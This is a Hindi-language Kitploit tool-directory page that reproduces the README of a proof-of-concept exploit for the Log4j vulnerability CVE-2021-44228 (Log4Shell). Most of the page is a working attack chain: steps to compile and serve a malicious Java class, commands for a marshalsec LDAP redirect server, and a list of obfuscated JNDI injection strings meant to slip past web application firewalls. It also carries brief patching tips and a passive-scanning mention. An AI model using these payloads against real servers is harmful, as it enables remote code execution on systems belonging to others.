Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — CVE-2021-44228 (Log4Shell) के लिए अवधारणा-सिद्ध शोषण जिसमें JNDI इंजेक्शन पेलोड, WAF बाईपास तकनीक, और Burp Suite के लिए निष्क्रिय स्कैनिंग एकीकरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/kannthu/cve-2021-44228-apache-log4j-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubkannthu/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

CVE-2021-44228 (Log4Shell) के लिए अवधारणा-सिद्ध शोषण जिसमें JNDI इंजेक्शन पेलोड, WAF बाईपास तकनीक, और Burp Suite के लिए निष्क्रिय स्कैनिंग एकीकरण शामिल है।

रिपॉजिटरी देखें
374 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228(Apache Log4j रिमोट कोड एक्जीक्यूशन)

सभी log4j-core संस्करण >=2.0-beta9 और <=2.14.1

1.x के संस्करण में अन्य कमजोरियाँ हैं, हम अनुशंसा करते हैं कि आप नवीनतम संस्करण में अपडेट करें।

सुरक्षा सलाहकार / बुलेटिन Log4Shell (CVE-2021-44228) से जुड़े

उपयोग:

root@kitploit:~
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
# For Python2
python -m SimpleHTTPServer 8888 
# For Python3
python3 -m http.server 8888
root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

अंत में प्रोजेक्ट चलाएँ, आप अपने स्थानीय से कैलकुलेटर देखेंगे।

Tips:

वर्तमान Java संस्करण पर भरोसा न करें कि वह आपको बचाएगा। Log4j को अपडेट करें (या JNDI lookup हटाएँ)। विस्तार को अक्षम करें (वैसे भी यह काफी बुरा विचार लगता है)।

rc1 को बायपास करें

उदाहरण के लिए:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF को बायपास करें

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

वेब एप्लिकेशन फ़ायरवॉल पर भरोसा न करें।

कमजोरी का विवरण

Lookups Log4j कॉन्फ़िगरेशन में मनमाने स्थानों पर मान जोड़ने का एक तरीका प्रदान करते हैं।

Lookups

अंत में लीक का कारण बनने के तरीके

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

सरल जाँच विधि

यदि आप ब्लैक-बॉक्स परीक्षण करना चाहते हैं, मैं सुझाव देता हूँ कि आप निष्क्रिय स्कैनिंग करें।

BurpLog4jScan

मज़े करें!!! BurpLog4jScan.png

Stargazers over time

Stargazers over time

टूल डाउनलोड करें